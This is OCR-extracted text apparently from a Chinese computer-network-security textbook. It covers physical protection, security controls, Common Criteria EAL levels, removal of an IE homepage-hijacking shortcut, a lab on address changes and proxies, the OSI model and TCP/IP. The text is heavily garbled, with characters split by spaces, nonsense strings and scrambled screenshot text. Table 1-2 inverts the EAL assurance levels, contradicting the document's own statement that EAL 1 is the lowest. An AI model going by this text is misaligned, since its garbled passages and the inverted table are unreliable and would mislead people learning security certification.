利用 传统 的 避雷 针 防 雷 ,不 但 会 增加 雷击 概率 ,还 会 产生 感应 雷 ,感应 雷 是 电子 信息 设 
备 被 损坏 的 主要 原因 之 一 ,也 是 易 燃 易 爆 品 被 引 燃 引爆 的 主要 原因 。 

目前 ,对 于 雷击 的 主要 防范 措施 是 根据 电气 、 微 电子 设备 的 不 同 功能 及 不 同 受 保护 程度 
和 所 属 保护 层 来 确定 防护 要 点 进行 分 类 保护 ; 根据 雷电 和 操作 瞬间 过 电压 危害 的 可 能 通 
道 ,从 电源 线 到 数据 通信 线路 都 应 进行 多 层 保护 。 


5. 防 电磁 泄露 


与 其 他 电子 设备 一 样 ,计算 机 在 工作 时 也 要 产生 电磁 发 射 。 电 磁 发 射 包 括 辐 射 发 射 和 
传导 发 射 两 种 类 型 。 而 这 两 种 电磁 发 射 可 被 高 灵敏 度 的 接收 设备 接收 并 进行 分 析 、 还 原 , 从 
而 会 造成 计算 机 中 信息 的 泄露 。 

目前 ,屏蔽 是 防 电 磁 泄露 的 有 效 措施 ,屏蔽 方式 主要 包括 电 屏蔽 、 磁 屏蔽 和 电磁 屏蔽 3 
种 类 型 。 对 应 的 措施 主要 是 做 好 辆 射 屏蔽 ,状态 检测 ,资料 备份 (因为 有 可 能 硬盘 的 损坏 是 
不 可 修复 的 , 那 可 能 丢失 重要 数据 ) 和 应 急 恢 复 。 


1.5.2 安全 控制 


安全 控制 是 指 在 网 络 信息 系统 中 对 信息 存储 和 传输 的 操作 进程 进行 控制 和 管理 ,重点 
在 网 络 信息 处 理 层次 上 对 信息 进行 初步 的 安全 保护 。 

安全 控制 主要 在 如 下 3 个 层次 上 进行 了 管理 。 

(1) 操作 系统 的 安全 控制 ,包括 用 户 身 份 的 核实 、 对 文件 读 写 的 控制 ,主要 是 保护 存储 
数据 的 安全 。 

(2) 网 络 接口 模块 的 安全 控制 ,在 网 络 环境 下 对 来 自 其 他 计算 机 网 络 通信 进程 的 安全 
控制 ,包括 客户 权限 设置 与 判别 、 审 核 日 记 等 。 

(3) 网 络 互 连 设备 的 安全 控制 ,主要 是 对 子 网 内 所 有 主机 的 传输 信息 和 运行 状态 进行 
安全 检测 和 控制 。 


1.5.3 安全 服务 


安全 服务 是 指 在 应 用 程序 层 对 网 络 信息 的 完整 性 .保密 性 和 信 源 的 真实 性 进行 保护 和 
鉴别 ,以 满足 用 户 的 安全 需求 ,防止 和 抵御 各 种 安全 威胁 和 攻击 手段 。 它 可 以 在 一 定 程度 上 
弥补 和 完善 现 有 操作 系统 和 网 络 信息 系统 的 安全 漏洞 。 

安全 服务 主要 包括 安全 机 制 、 安 全 连接 、 安 全 协议 和 安全 策略 。 


1. 安全 机 制 


安全 机 制 即 利用 密码 算法 对 重要 而 敏感 的 数据 进行 处 理 。 现 代 密码 学 的 作用 举 足 轻 
重 。 现 在 ,网 络 中 很 多 重要 的 应 用 程序 对 数据 都 进行 了 加 密 、 解 密 , 还 有 数字 签名 等 ,这 些 都 
是 网 络 的 安全 机 制 。 


2. 安全 连接 


安全 连接 即 安全 处 理 前 与 网 络 通信 方 之 间 的 连接 过 程 ,为 安全 处 理 提供 必要 的 准备 工 
f: ,主要 包括 密 钥 的 生成 分 配 和 身份 验证 (用 于 保护 信息 处 理 和 操作 以 及 双方 身份 的 真实 
性 和 合法 性 ) 。 


3. 安全 协议 


在 网 络 环境 下 , 互 不 信任 的 通信 双方 通过 一 系列 预先 约定 的 有 序 步骤 后 能 够 相互 配合 ， 
并 通过 安全 连接 和 安全 机 制 的 实现 来 保证 通信 过 程 的 安全 性 、 可 靠 性 和 公平 性 。 这 一 系列 
预先 约定 的 有 序 步 骤 就 是 安全 协议 。 


4. 安全 策略 


安全 策略 是 由 管理 员 制 定 的 活动 策略 ,是 安全 体制 ,安全 连接 和 安全 协议 的 有 机 组 合 方 
式 , 是 网 络 信息 系统 安全 性 的 完整 解决 方案 。 安 全 策略 决定 了 网 络 信息 安全 系统 的 整体 安 
全 性 和 实用 性 ,基于 代码 所 请 求 的 权限 为 所 有 托管 代码 以 编程 方式 生成 授予 的 权限 ; 对 于 
要 求 的 权限 比 策略 允许 的 权限 还 要 多 的 代码 ,将 不 允许 其 运行 。 合 理 的 安全 策略 能 降低 安 
全 事件 的 出 现 概率 。 

安全 策略 主要 有 如 下 3 个 方面 。 

CD 威严 的 法 律 。 现 在 网 络 上 的 许多 行为 都 无 法 可 依 , 必 须 建立 与 网 络 安全 相关 的 法 
律 .法规 才 行 。 

(2) 先进 的 技术 。 这 是 网 络 安全 与 保密 的 根本 保证 。 用 户 对 自身 面临 的 威胁 进行 风险 
评估 ,决定 所 需要 的 安全 服务 种 类 ,选择 相应 的 安全 机 制 , 然 后 集成 先进 的 安全 技术 , 即 可 有 
效 防范 。 

(3) 严格 的 管理 。 在 各 个 部 门 中 建立 相关 的 安全 管理 办 法 ,加 强 内 部 管理 ,建立 合适 的 
网 络 安全 管理 ,建立 安全 审核 与 跟踪 体系 ,提供 整体 员工 的 网 络 安全 意识 。 这 些 都 将 有 效 
工作 。 

安全 策略 的 设施 应 遵循 如 下 3 个 原则 。 

CD 最 小 特权 原则 。 它 是 指 主体 在 执行 操作 时 将 按照 其 所 需 权 利 的 最 小 化 原则 分 配 
权利 。 

(2) 最 小 泄露 原则 。 它 是 指 主 体 执行 任务 时 按照 主体 所 需要 知道 的 信息 最 小 化 的 原则 
分 配给 主体 权利 。 

(3) 多 级 安全 策略 。 它 是 指 主体 与 客体 之 间 的 数据 流向 和 权限 控制 按照 绝密 (TS) 、 秘 
密 (S) ,机密 (C) 限制 (RS) 和 无 级 别 (U) 这 5 个 安全 级 别 来 划分 。 

在 网 络 安全 中 , 除 采 取 上 述 技术 外 ,加 强 网 络 的 安全 管理 ,制定 有 关 的 规章 制度 ,对 于 确 
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保 网 络 的 安全 、 可 靠 运行 ,也 能 起 到 十 分 有 效 的 作用 。 

网 络 的 安全 管理 策略 包括 确定 安全 管理 等 级 和 安全 管理 范围 ,制定 有 关 网 络 操作 使 用 
规程 和 人 员 出 入 机 房管 理 制度 、 制 定 网 络 系统 的 维护 制度 和 应 急 措施 等 。 

随 着 计算 机 技术 和 通信 技术 的 发 展 ,计算 机 网 络 将 日 益 成 为 工业 、 农 业 和 国防 等 方面 的 
重要 信息 交换 手段 ,渗透 到 社会 生活 的 各 个 领域 。 因 此 , 认 清 网 络 的 脆弱 性 和 潜在 威胁 , 采 
取 强 有 力 的 安全 策略 ,对 于 保障 网 络 的 安全 性 将 变 得 十 分 重要 。 


1.6 国内 外 信息 安全 等 级 认证 与 评测 发 展 和 现状 


美国 信息 安全 研究 起 步 较 早 ,力度 大 ,积累 多 ,应 用 广 ,技术 先进 ,一 直 把 信息 领域 作为 
国家 的 重要 基础 设施 ,在 20 世纪 70 年 代 美国 的 网 络 安 全 技术 基础 理论 研究 成 果 * 计 算 机 保 
密 模型 "(Beu& La padula 模型 ) 的 基础 上 ,制定 了 “可 信 计 算 机 系统 安全 评估 准则 ” 
(TCSEC) ,之 后 又 制定 了 关于 网 络 系统 数据 库 方面 的 系列 安全 解释 ,形成 了 安全 信息 系统 
体系 结构 的 准则 。1997 年 ,美国 国家 标准 技术 研究 所 和 国家 安全 局 共同 组 建 了 国家 信息 保 
证 伙伴 (NIAP) ,专门 负责 基于 CC 信息 安全 的 测试 和 评估 ,并 研究 开发 相关 的 测评 认证 方 
法 和 技术 。 在 国家 安全 局 中 ,对 NIAP 的 具体 管理 则 由 专门 管理 保密 信息 系统 安全 的 办 公 
室 负 责 。 

一 些 欧洲 国家 和 日 本 ,韩国 等 都 效仿 这 种 模式 ,也 建立 了 自己 的 安全 评测 体系 ,如 德国 
的 GISA 加拿大 的 CSSC 法 国 的 SCSSI\ 澳 大 利 亚 的 AISEP 等 分 别 负责 本 国 的 信息 安全 评 
测 体系 。 

国际 标准 化 组 织 于 1990 年 开始 着 力 研究 一 个 共同 标准 。1993 4E. (E [3 24s E] , fij 25,38 
国 、 加 拿 大 和 美国 6 个 国家 的 7 个 部 门将 各 自 的 标准 组 合成 一 个 全 球 标 准 , 即 信息 技术 安全 
评估 共同 标准 (Common Criteria for Information Technology Security Evaluation. 
CCITSE) ,通常 称 为 共同 标准 (Common Criteria.CC) 。CC 的 发 展 历程 如 表 1-1 所 示 。 


表 1-1 CC 的 发 展 历程 


国家 时 间 标准 名 称 功能 级 别 保证 级 别 
美国 1980 TCSEC D.C1.C2.B1.B2.B3.A1 
德国 1985 mud F1—F10 Q1—Q8 
英国 1989 L1—L66 
欧 共 体 1991 ITSEC Fl1~F10 E0~E7 
加 拿 大 1993 CTCPEC 
美国 1993 FC 
ISO 1999 cc EAL 1—EAL 7 


CC 评估 保证 级 别 通常 有 7 个 保证 级 , 称 为 EAL 1—EAL 7. 
1. EAL 1 保证 级 


EAL 1 保证 级 为 最 低 的 保证 级 别 , 它 对 开发 人 员 和 用 户 来 说 是 有 意义 的 。 它 定义 了 最 
低 程度 的 保证 ,以 产品 安全 性 能 分 析 为 基础 ,并 以 使 用 功能 和 接口 设计 来 理解 安全 行为 。 


2. EAL 2 保证 级 

EAL 2 保证 级 是 在 不 需要 强加 给 产品 开发 人 员 除 EAL 1 要 求 的 任务 之 外 的 附加 任务 
的 情况 下 可 授予 的 最 高 保证 级 别 。 它 执行 对 功能 和 接口 规范 的 分 析 以 及 对 产品 子 系统 的 高 
级 设计 检查 。 

3. EAL 3 保证 级 

EAL 3 保证 级 是 一 种 中 间 的 、 独 立 确定 的 安全 级 别 ,就 是 说 安全 要 由 外 部 源 来 证 实 。 
该 级 别人 允许 设计 阶段 给 予 最 大 的 保证 ,而 测试 过 程 中 几乎 不 加 修改 。 最 大 的 保证 是 指 在 设 
计时 已 经 考虑 到 了 安全 问题 ,而 不 是 设计 完 之 后 再 实现 安全 性 ,开发 人 员 必 须 提 供 测试 数 
据 , 包 括 易 受 攻击 的 分 析 , 并 有 选择 地 加 以 验证 。 

4. EAL 4 保证 级 


EAL 4 保证 级 是 改进 已 有 生产 线 可 行 的 最 高 保证 级 别 。 它 向 用 户 提供 了 最 高 的 安全 
级 别 , 也 是 以 良好 的 商业 软件 开发 经 验 为 基础 的 。 除 了 具有 EAL 3 级 的 内 容 外 ,EAL 4 还 
包含 对 产品 的 易 受 攻击 性 进行 独立 搜索 的 功能 。 


5. EAL 5 保证 级 


EAL 5 保证 级 对 现 有 的 产品 来 说 是 不 易 达 到 的 ,该 级 别 适 用 于 那些 在 严格 的 开发 方法 
中 要 求 较 高 保证 级 别 的 开发 人 员 和 用 户 。 在 这 一 级 别 上 ,开发 人 员 也 必须 提出 设计 规范 和 
如 何 从 功能 上 实现 这 些 规范 。 

6. EAL 6 保证 级 

EAL 6 保证 级 包含 一 个 半 正 式 的 验证 设计 和 测试 主 件 , 并 包含 EAL 5 级 的 所 有 内 容 ， 
除 此 之 外 还 应 提出 实现 的 结构 化 表示 。 同 时 ,产品 要 经 受 高 级 的 设计 检查 ,而 且 必须 保证 具 
有 高 度 的 抗 攻击 性 能 。 

7. EAL 7 保证 级 


EAL 7 保证 级 用 于 最 高 级 别 的 安全 应 用 程序 。EAL 7 包含 完整 的 ,独立 的 和 正式 的 设 
计 、 测 试 和 验证 。 
表 1-2 显示 了 CC 各 级 别 对 应 的 应 用 领域 及 保证 级 别 。 


表 1-2 CC 评估 保证 级 别 


级 别 保证 应 用 领域 评估 保证 级 别 

EAL 7 低 个 人 及 简单 商用 形式 化 验证 设计 和 测试 级 
EAL 6 中 低 个 人 、 一 般 商 用 及 简单 政 用 半 形 式 化 验证 设计 和 测试 级 
EAL 5 中 一 般 政 用 和 特定 商用 半 形 式 设 计 和 测试 级 

EAL 4 中 高 特定 政 用 和 关键 商用 系统 设计 、 测 试 和 复查 级 
EAL 3 高 关键 政 用 和 核心 商用 系统 测试 和 检查 级 

EAL 2 极 高 政府 要 害 部 门 .商业 要 害 环节 结构 测试 级 

EAL 1 最 高 核心 处 理 领 域 功能 测试 级 


实践 


中 国 已 接受 了 OSI 安全 体系 结构 , 即 IS07498-2 标准 ,在 中 国 命名 为 GB/T 9387-2 标 
准 ,并 完善 了 国家 信息 安全 测评 认证 体系 , 即 CC 评估 认证 体系 。 


ASP IE 快捷 方式 加 载 特定 主页 


某 插件 安装 后 ,桌面 上 会 增加 一 个 首页 为 特定 网 站 的 TE 快捷 方式 (不 对 原 有 的 IE 做 任 
何 改动 ) ,同时 ,会 把 快速 启动 栏 中 的 TE 快捷 方式 主页 改 为 特定 网 站 。 

解决 办 法 如 下 。 

方法 一 : 直接 把 桌面 新 增加 的 IE 快捷 方式 删除 。 

方法 二 : 把 快速 启动 栏 中 TE 快捷 方式 里 面 的 地 址 删除 。 

方法 三 : 右 击 快速 启动 栏 中 的 IE, 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 打开 属性 设置 
对 话 框 ,如 图 1-1 所 示 。 

把 “目标 ”文本 框 的 链接 (此 处 是 http://www. *** . com. cn/eindex. html) 删 除 即 可 ， 
如 图 1-2 所 示 。 


启动 Internet Explorer 浏览 器 EE 启动 Internet Explorer 浏览 器 Et AR 
LEONE LE LONE SLE 73 
£ meses nne nm £ DE 
目标 关 型 ，。 应 用 程序 E — 应 用 程序 
目标 位 置 Internet Explorer 目标 位 置 :Internet Explorer 
ELTE ELTE Files\Internet ZxplorerXIZXPLORE. EXE” 
amao: | AREE D 
tep: x nerw: (X 
运行 方式 他 )，| 常规 窗口 ` 运行 方式 Q): "SEE ` 
备注 由; 备注 四 : 
ERRED...) Elmo...) ena»... Erino.. ) [eines c...) [ aeo... 
LY [we j( wa (ma 
图 1-1 “快捷 方式 ”选项 卡 图 1-2 删除 “目标 "文本 框 中 的 链接 


第 三 种 删除 方式 对 在 桌面 新 增加 的 IE 快捷 方式 同样 有 效 。 

【提示 】 是 否 可 以 利用 第 三 种 方法 设计 自己 的 加 载 特定 页 面 的 快捷 方式 呢 ? 需要 注意 
的 是 ,如 果 直 接 创建 IE 快捷 方式 时 其 “目标 ?是 锁定 状态 , 则 需要 绕 过 系统 的 限制 ,具体 办 法 
有 很 多 ,一 种 简单 方法 是 先 创建 一 个 比如 记事 本 的 快捷 方式 ,再 把 它 的 目标 改 回 为 TE 的 路 
径 和 文件 名 (这 种 * 迁 回 策略 ?在 后 面 的 介绍 中 还 要 多 次 用 到 ) 。 请 设计 一 个 IE 快捷 方式 , 启 
动 后 自动 链接 www. pcbjut. cn, 

其 实 防止 IE 主页 地 址 被 修改 也 可 以 借鉴 此 方法 。 和 上 面 的 方法 相同 ,在 explore. exe 
快捷 方式 的 “目标 ?文本 框 里 填 人 “C:\Program Files\Internet Explorer EXPLORE. EXE- 


nohome”, 给 Iexplore. exe 加 上 参数 “-nohome”, 然 后 单 击 “ 确 定 ” 按 钮 退出 即 可 。 
[$2 者 加 了 ”通信 和 屏 菩 与 代理 


(1) A 修改 自己 的 IP 地 址 为 也 的 IP 地址 ,查看 AB 通信 结果 ,并 截图 加 以 说 明 。 

(2) A 修改 自己 的 MAC 地 址 为 B 的 IP 地 址 ,A 的 IP 地址 仍然 为 A 原来 的 地 址 。 查 
看 AB 通信 结果 ,并 截图 说 明 

(3) 手工 方式 屏蔽 某 一 个 网 站 。 

(4) A 安装 CCPROXY 或 Wingate,B 设置 本 地 代理 服务 器 地 址 为 A 的 地 址 ,查看 AB 
通信 结果 ,并 截图 说 明 。 
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2.1 网 络 的 基础 知识 
2.1.1 计算 机 网 络 及 其 拓扑 结构 


计算 机 网 络 是 利用 通信 设备 和 线路 将 地 理 位 置 不 同 、 功 能 独立 的 多 
个 计算 机 系统 连接 起 来 ,以 功能 完善 的 网 络 软件 (网 络 协议 、 信 息 交 换 方 
式 ,控制 程序 和 网 络 操作 系统 ) 实 现 网 络 的 资源 共享 和 信息 传递 的 系统 ， 
如 图 2-1 所 示 。 


Internet 


1 路 由 器 


图 2-1 计算 机 网 络 


网 络 拓扑 结构 是 在 给 定 计算 机 终端 位 置 及 保证 一 定 可靠 性 .时 延 、 
在 吐 量 的 情况 下 所 选择 的 使 整个 网 络 成 本 最 低 的 合适 的 通路 、 线 路 容量 
以 及 流量 分 配 , 也 就 是 指 计 算 机 的 连接 方式 。 


2.1.2 计算 机 网 络 的 分 类 


计算 机 网 络 中 有 两 种 重要 的 分 类 标准 , 即 基 于 传输 技术 分 类 和 基于 
规模 分 类 。 

1. 基于 传输 技术 分 类 

基于 不 同 的 传输 技术 ,计算 机 网 络 分 为 广播 式 网 络 和 点 对 点 网 络 。 


广播 式 网 络 上 的 所 有 计算 机 共享 同一 条 通信 信道 。 任 何 计 算 机 都 可 以 发 送 或 接收 消 
息 , 这 些 消 息 是 按 某 种 语法 组 织 的 分 组 或 包 , 其 中 设置 有 一 些 字 段 ( 称 地 址 字段 ) 来 指明 这 些 
消息 应 该 被 哪 台 计算 机 接收 。 各 个 计算 机 一 旦 收 到 消息 ,就 会 先 检查 它 的 地 址 字段 ,如 果 地 
址 字段 和 计算 机 本 身 的 地 址 是 一 样 的 ,该 计算 机 就 接收 这 个 消息 ,否则 直接 丢弃 这 个 消息 ， 
不 做 任何 处 理 。 需 要 说 明 的 是 ,一 个 计算 机 可 以 向 多 个 计算 机 同时 发 送 同 一 个 消息 。 

点 对 点 网 络 由 多 条 点 对 点 的 连接 (也 就 是 一 台 计 算 机 到 一 台 计 算 机 的 连接 ) 构 成 。 为 了 
能 从 源 地 址 发 送 到 达 目 的 地 址 ,网 络 上 的 分 组 可 能 需要 通过 一 台 或 多 台中 间 计 算 机 。 点 对 
点 网 络 中 通常 可 以 有 多 条 路 径 到 达 同 一 个 目标 ,那么 在 这 样 的 网 络 中 ,如 何 选择 传送 消息 的 
路 径 很 重要 。 

通常 地 理 上 处 于 本 地 的 网 络 采用 的 是 广播 方式 ,而 其 他 一 般 采 用 点 对 点 方式 。 


2. 基于 规模 分 类 


这 类 标准 是 基于 连接 距离 进行 分 类 ,常见 的 是 局 域 网 、 城 域 网 和 广域网 。 

局 域 网 简称 LAN 是 用 于 处 于 同一 个 建筑 物 或 者 同一 个 小 区 内 的 专用 网 络 , 经 常 呈现 
为 公司 网 络 或 大 学 校园 网 络 ,可 以 方便 资源 的 共享 和 信息 的 交换 。 

局 域 网 的 覆盖 范围 比较 小 ,即使 在 最 坏 的 情况 下 , 它 的 传输 时 间 也 是 有 限 的 ,并 且 可 以 
预先 知道 传输 时 间 。 局 域 网 通常 使 用 一 条 电缆 连接 所 有 机 器 ,其 速度 经 常 是 10Mbps 或 
100Mbps, 传 输 通 只 需要 几 十 毫秒 ,出 错 率 低 。 

城 域 网 简称 MAN ,是 一 种 大 型 的 局 域 网 ,其 使 用 的 技术 也 与 局 域 网 相似 。 它 可 能 是 覆 
盖 了 一 个 城市 的 网 络 ,可 以 是 私 用 的 ,也 可 以 是 公用 的 网 络 。 它 可 以 支持 数据 和 声音 ,并 且 
可 能 涉及 当地 的 有 线 电 视 网 。 一 般 它 只 使 用 一 条 或 两 条 电缆 ,并 不 包括 单元 , 即 是 把 分 组 分 
流 到 几 条 可 能 的 引出 电缆 的 设备 。 

广域网 简称 W AN ,是 一 种 地 域 跨越 大 的 网 络 ,通常 包括 一 个 国家 或 州 ,主机 通过 通信 
子 网 连接 。 通 信子 网 的 功能 是 把 消息 从 一 台 主 机 传 到 另 有 一 台 主 机 。 

在 大 多 数 广域网 中 , 子 网 由 两 个 不 同 的 部 分 组 成 ,分 别 为 传输 线 和 分 组 交换 节点 。 传 输 
线 也 称 线路 、 信 道 和 干线 ,在 计算 机 之 间 传 输 信息 。 分 组 交换 节点 是 一 种 特殊 的 计算 机 ,用 
于 连接 两 条 或 更 多 传输 线 。 数 据 从 传输 线 到 达 时 ,交换 单元 必须 为 它 选择 一 条 输出 线路 。 
通常 将 交换 单元 称 为 路 由 器 ,每 个 主机 都 被 连接 到 一 个 带 有 路 由 器 的 局 域 网 上 ,在 某 些 情况 
下 ,主机 可 以 直接 连接 到 路 由 器 上 。 通 信 线 路 和 路 由 器 的 集合 构成 了 子 网 ,如 图 2-2 所 示 。 

广域网 


图 2-2 广域网 连接 


实践 


2.1.3 OSI 参考 模型 


国际 标准 化 组 织 (ISO) 在 1979 年 建立 了 一 个 分 委员 会 来 专门 研究 一 种 用 于 开 系 统 互 
连 的 体系 结构 (Open Systems Interconnection) ,简称 OSI。 这 个 分 委 会 提出 了 开放 系统 互 
连 , 即 OSI 参考 模型 ,定义 了 连接 各 种 计算 机 的 标准 框架 。 

OSI 参考 模型 分 为 如 下 所 述 7 层 。 


1. 物理 层 


物理 层 利用 物理 媒介 (如 双 绞 线 、 同 轴 电 缆 等 ) 来 传递 信息 。 其 任务 是 为 上 一 层 提供 一 
个 物理 连接 和 规定 这 一 层 中 的 功能 和 过 程 特征 等 。 在 这 一 层 里 面 ,数据 是 没有 被 组 织 的 ,只 
是 作为 原始 的 位 流 或 者 电压 处 理 ,单位 是 位 (b) 。 


2. 数据 链 路 层 


数据 链 路 层 负 责 在 两 个 相 邻 节点 间 无 差错 地 传送 以 帧 为 单位 的 数据 。 每 一 个 帧 包含 一 
定数 量 的 数据 和 必要 的 控制 信息 。 它 主要 的 工作 是 负责 建立 维持 和 释放 数据 链 路 的 连接 ， 
与 物理 层 相似 。 在 传送 数据 时 ,如 果 接 收 方 检测 到 所 传 数据 中 有 差错 ,需要 通知 发 送 方 重新 
发 送 这 一 帧 。 

3. 网 络 层 


网 络 层 选择 合适 的 路 由 器 和 路 由 的 路 径 ,确保 数据 及 时 和 正确 的 输送 。 因 为 网 络 中 
从 始 发 节点 到 目标 节点 之 间 可 能 经 过 很 多 子 网 和 链 路 连接 ,网 络 层 就 是 要 确保 这 些 任 务 
的 顺利 完成 。 网 络 层 中 传送 的 单位 称 为 数据 包 , 包 含 信 息 的 始 发 节点 地 址 和 目标 节点 
地 址 。 


4. 传输 层 


传输 层 的 任务 是 根据 通信 子 网 的 特性 最 好 地 利用 网 络 资源 ,并 为 上 层 准 备 好 建立 、 维 护 
和 取消 连接 的 工作 ,负责 可 靠 地 传送 数据 。 传 送 的 单位 为 报 文 。 


5. 会 话 层 

会 话 层 提供 包括 访问 验证 和 会 话 管理 在 内 的 建立 和 维护 应 用 层 之 间 的 通信 的 机 制 。 
6. 表示 层 

表示 层 主 要 解决 用 户 信息 的 语法 表示 问题 ,就 是 提供 格式 化 的 表示 和 数据 转换 服务 。 
7. 应 用 层 

应 用 层 确 定 网 络 间 通信 的 性 质 以 及 提供 网 络 与 用 户 应 用 软件 之 间 的 接口 。 


2.2 TCP/IP 协议 
2.2.1 TCP/IP 协议 及 其 优点 


TCP/IP 是 指 用 于 Internet. 上 机 器 间 通 信 的 协议 集 ( 协 议 是 为 了 进行 网 络 数据 交换 而 
建立 的 规则 、 标 准 或 约定 ) 。 它 是 一 个 稳定 ,构造 优 良 、. 富 有 竞争 性 的 协议 集 , 能 使 任何 有 具 
有 计算 机 、 调 制 解 调 器 (modem) 和 Internet 服务 提供 者 的 用 户 能 访问 和 共享 互联 网 上 的 
信息 。 

利用 TCP/IP 协议 建立 互联 网 比 利 用 其 他 协议 具有 更 大 的 便利 ,其 中 一 个 原因 是 因为 
TCP/IP 可 以 在 各 种 不 同 的 硬件 和 操作 系统 上 工作 ,可 以 迅速 方便 地 建立 一 个 异 质 网 络 ,其 
中 的 系统 使 用 共同 的 协议 集 进行 通信 。TCP/IP 是 一 个 开放 式 的 通信 协议 ,开放 性 就 意味 
着 在 任何 组 织 之 间 , 不 管 这 些 设备 的 物理 特征 有 多 大 的 差异 ,都 可 以 进行 通信 。 

TCP/IP 协议 负责 管理 和 引导 数据 在 互联 网 上 的 传输 。 

TCP/IP 的 优点 如 下 所 述 。 

* 具有 良好 的 破坏 修复 机 制 。 当 网 络 部 分 遭 到 入 侵 而 受 损 时 ,剩余 的 部 分 仍然 能 正常 

TE. 

* 能 够 在 不 中 断 现 有 服务 的 情况 下 扩展 网 络 。 

° 有 高 效 的 错误 处 理 机 制 。 

。 具有 平台 无 关 性 。 就 是 可 以 在 不 同 的 主机 上 使 用 不 同 的 操作 系统 而 不 影响 通信 的 

。 数据 传输 开销 小 。 


2.2.2 TCP/IP 的 体系 结构 


TCP/IP 具有 四 个 功能 层 ,分 别 为 应 用 层 、 传 输 层 .网 络 互 联 层 ( 也 称 网 络 层 ) 和 网 络 接 
口 层 (也 称 链 路 层 ) 。 表 2-1 展示 了 各 层 中 使 用 的 常见 协议 。 


表 2-1 TCP/IP 四 层 参考 模型 及 各 层 上 的 部 分 协议 


DNS,NFS,HTTP 
应 用 层 Telnet FTP,SMTP TFTP,SNMP 
其 他 
传输 层 TCP UDP 
网 络 互联 层 IP.ICMP.ARP.RARP 
网 络 接口 层 | Ethernet Token Ring 其 他 
1. 网 络 接口 层 


网 络 接口 层 负责 从 主机 或 节点 接收 IP 分 组 ,然后 发 送 到 指定 的 物理 网 络 上 。 它 包括 了 
用 户 物 理 连接 和 传输 的 所 有 功能 。 


实践 


2. 网 络 互联 层 


网 络 互联 层 是 整个 体系 结构 的 关键 部 分 ,其 功能 是 使 主机 把 分 组 发 往 任 何 网 络 ,并 使 分 
组 独立 地 传 向 目的 地 。 这 些 分 组 到 达 的 顺序 和 发 送 的 顺序 可 能 不 同 , 因 此 如 需要 按 顺序 发 
送 及 接收 ,高层 必须 对 分 组 排序 。 该 层 主要 有 IP, ARP, RARP, ICMP, IGMP, RIP, OSPF 
和 EGP 等 协议 。 
IP 协议 提供 的 最 基本 的 服务 是 负责 管理 客户 端 与 服务 端 之 间 的 报 文 传送 ,涉及 的 是 网 
络 层次 上 的 传送 。IP 模块 是 TCP/IP 技术 的 核心 , 它 的 关键 是 路 由 表 ( 存 放 在 路 由 器 中 )， 
它 的 IP 地 址 决定 了 路 由 里 面 消息 ( 报 文 ) 的 发 送 方向 ,对 于 网 上 的 某 个 节点 来 说 是 一 个 多 辑 
地 址 。 它 独立 于 任何 特定 的 网 络 硬件 和 网 络 配置 ,不 管 物理 网 络 的 类 型 如 何 , 都 有 相同 的 格 
式 , 如 表 2-2 所 示 。 
表 2-2 IP 格 式 
版 本 (4 位 ) 头 长 度 (4 位 ) 服务 类 型 (8 位 ) 封包 总 长 度 (16 位 ) 
封包 标识 (16 位 ) 标志 (3 位 ) 片段 偏 移 地 址 (13 位 ) 
存活 时 间 (8 位 ) 协议 (8 位 ) 校 验 和 (16 位 ) 
来 源 IP 地 址 (32 位 ) 
目的 IP 地 址 (32 位 ) 
选项 (可 选 ) 填充 (可 选 ) 
数据 


IP 地 址 是 由 四 段 八 位 的 二 进 制 数组 成 的 ,通常 可 看 做 两 个 部 分 ,第 一 个 部 分 是 IP 网 络 
号 ,第 二 个 部 分 是 主机 号 。IP 49 A,B,C, D,E 五 类 地 址 。 

* AŽ: 1.0.0.0 一 126.0.0.0, 每 个 网 络 中 的 最 大 主机 数 为 16777214。 

。B 类 : 128.1.0.0 一 191.254.0.0, 每 个 网 络 中 的 最 大 主机 数 为 65534。 

。C 类 : 192. 0.1.0 一 223.255.254.0, 每 个 网 络 中 的 最 大 主机 数 为 254。 

* D 类 第 一 个 字 节 以 1110 开始 ,用 于 多 点 广播 。 

。 下 类 第 一 个 字 节 以 1111 开始 ,保留 地 址 。 

在 接 入 网 络 前 ,必须 首先 配置 主机 在 局 域 网 中 的 IP 地 址 。 首 先 , 右 击 * 网 络 邻居 ”图标 ， 
在 弹出 的 快捷 菜单 中 选择 “属性 "命令 。 

在 打开 的 窗口 中 选择 并 右 击 “本 地 连接 ”图 标 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,在 
打开 的 窗口 中 色 选 “Internet 协议 (TCP/IP)” 复 选 框 ,然后 单 击 “ 属 性 ”按钮 即 可 见 到 IP 地 
址 的 设置 情况 。 


3. 传输 层 


传输 层 支持 的 功能 包括 对 应 用 数据 进行 分 段 、 确 保 所 接收 的 数据 的 完整 性 、 为 多 个 应 用 
同时 传输 数据 进行 多 路 复 用 (传输 和 接收 ) 。 

当前 主机 到 主机 层 包 括 传输 控制 协议 (TCP) 和 用 户 数据 报 协议 (UDP) 两 个 协议 ,如 
表 2-3、 表 2-4 所 示 。 

常用 服务 端口 列表 如 表 2-5 所 示 。 


表 2-3 TCP 格式 


来 源 端口 (2 字 节 ) 


目的 端口 (2 字 节 ) 


序号 (4 字 节 ) 


确认 序号 (4 字 节 ) 


头 长 度 (4 位 ) 


保留 (6 位 ) 


URG 


ACK 


PSH 


RST 


SYN PIN 


窗口 大 小 (2 字 节 ) 


校 验 和 (16 位 ) 


紧急 指针 (16 位 ) 


选项 (可 选 ) 


源 端 口 (2 字 节 ) 


目的 端口 (2 字 节 ) 


封 报 长 度 (2 字 节 ) 


校 验 和 (2 字 节 ) 


数据 


表 2-5 常用 服务 端口 列表 


LEE! 


RO * 


21 
25 
53 
80 
135 
137 
138 
139 
443 
445 
3389 


TCP 
TCP 
TCP/UDP 
TCP 
TCP 
UDP 
UDP 
TCP 
TCP 
TCP/UDP 
TCP 


FTP 服务 

SMTP 服务 

DNS 服务 

Web 服务 

RPC 服务 

NetBIOS 域名 服务 
NetBIOS 数据 报 服务 
NetBIOS 会 话 服务 
基于 SSL 的 HTTP 服务 
Microsoft SMB 服务 
Windows 终端 服务 


TCP/IP 协议 体系 结构 支持 两 种 基本 的 传输 协议 , 即 TCP 和 UDP。TCP 是 传输 层 协 
议 , 代 表 传输 控制 协议 ,提供 可 靠 的 端 到 端的 通信 服务 。UDP 是 用 户 数据 报 协议 ,用 于 在 两 
个 UDP 端点 之 间 支 持 无 连接 ,不 可 靠 的 传输 服务 。 它 们 之 间 的 共同 点 是 都 使 用 IP 作为 其 
